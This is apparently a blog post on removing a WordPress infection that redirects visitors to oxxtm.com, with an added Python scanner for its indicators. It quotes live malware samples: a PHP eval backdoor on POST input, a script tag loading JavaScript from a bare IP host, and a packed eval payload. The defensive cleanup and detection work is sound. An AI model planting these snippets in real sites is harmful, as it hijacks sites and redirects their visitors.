So I have been sitting with this silly yet very sticky piece of malware on WordPress sites. It is an attack in which arbitrary code is executed on your WordPress instance to hijack the site and redirect visitors to oxxtm.com.
To save everyone some time here is what I had to do to get rid of it:
Make a backup of your database and files.
Delete all the rubbish files in the WordPress root folder (files and folders with numeric or gibberish names).
Look for any suspicious eval statements across the entire WordPress installation. I used PHPStorm’s “find in path” tool. You will immediately find little eval snippets, particularly in theme code; they look something like this. If you don’t know how to clear these, just get a fresh copy of your theme and replace the theme files.
@ eval ($_POST["dd"]);
Clean up the injected JavaScript nasties. The culprit behind the redirect is some JavaScript injected into the WordPress index.php file:
<script type='text/javascript' src='https://5.157.54.13/jquery.js'></script> <script type='text/javascript' src='/wp-includes/js/jquery/jquery.js'></script>
The first script tag points to externally hosted JavaScript, and the second points to your very own jquery.js, which has been injected with even more nasties:
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k)p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k);return p;}('d("\\1\\7\\4\\e\\0\\1\\3\\g\\0\\b\\f\\2\\7\\0\\4\\3\\6\\c\\l\\m\\n\\9\\6\\2\\2\\k\\h\\5\\5\\1\\1\\1\\3\\0\\a\\a\\2\\8\\3\\b\\0\\8\\9\\i\\j");',24,24,'x6f|x77|x74|x2e|x6e|x2f|x68|x69|x6d|x22|x78|x63|x72|eval|x64|x61|x6c|x3a|x3b|x20|x70|x65|x66|x3d'.split('|'),0,{}));
To fix this, simply replace these files with the original WordPress files. In my case I copied a fresh WordPress download into the site’s root directory and overwrote all files.
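As an added example (not part of the original post), here is a small Python scanner that automates the “find in path” step above and also flags the two JavaScript indicators from the injected files: a script tag whose src points at a bare IP address, and the eval(function(p,a,c,k,e,d) packer wrapper. The eval pattern tolerates the @ and stray spaces seen in the snippet above, which a naive grep for “eval(” would miss; matching base64_decode( wrappers is a common variant that goes slightly beyond this post.

```python
import re
from pathlib import Path

# Patterns drawn from the indicators described in the post.
# (1) PHP backdoor: eval of request-controlled input, optionally with the
#     '@' error-suppression operator and whitespace, e.g. @ eval ($_POST["dd"]);
#     (the base64_decode wrapper is a common variant, not one the post shows)
PHP_EVAL_INPUT = re.compile(
    r'@?\s*eval\s*\(\s*(?:base64_decode\s*\(\s*)?\$_(?:POST|GET|REQUEST|COOKIE)\b',
    re.IGNORECASE)
# (2) <script src=...> whose host is a bare IP address; WordPress itself never does this
SCRIPT_IP_SRC = re.compile(
    r"<script[^>]*\bsrc\s*=\s*['\"]?https?://(\d{1,3}(?:\.\d{1,3}){3})", re.IGNORECASE)
# (3) the "packer" wrapper used to hide the redirect payload inside jquery.js
JS_PACKER = re.compile(
    r'eval\s*\(\s*function\s*\(\s*p\s*,\s*a\s*,\s*c\s*,\s*k\s*,\s*e\s*,\s*d\s*\)')

def scan_text(text):
    """Return a list of (indicator, detail) tuples found in one file's content."""
    hits = []
    for m in PHP_EVAL_INPUT.finditer(text):
        hits.append(("php_eval_of_request_input", m.group(0).strip()))
    for m in SCRIPT_IP_SRC.finditer(text):
        hits.append(("script_src_ip_host", m.group(1)))
    if JS_PACKER.search(text):
        hits.append(("packed_js_eval", "eval(function(p,a,c,k,e,d)...)"))
    return hits

def scan_tree(root, suffixes=(".php", ".js", ".html")):
    """Walk a WordPress install; map relative path -> findings for files with hits."""
    root = Path(root)
    report = {}
    for path in root.rglob("*"):
        if path.is_file() and path.suffix.lower() in suffixes:
            hits = scan_text(path.read_text(encoding="utf-8", errors="replace"))
            if hits:
                report[str(path.relative_to(root))] = hits
    return report

if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "."
    for rel, hits in sorted(scan_tree(target).items()):
        for kind, detail in hits:
            print(f"{rel}: {kind}: {detail}")
```

Run it as python scan.py /path/to/wordpress and review every hit by hand, since legitimate code can also call eval. Copying a fresh WordPress over the root replaces core files only, so re-run the scan over wp-content (themes, plugins, uploads) afterwards.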
I hope this helps and if you need any help, just drop me a line @cmptrwizard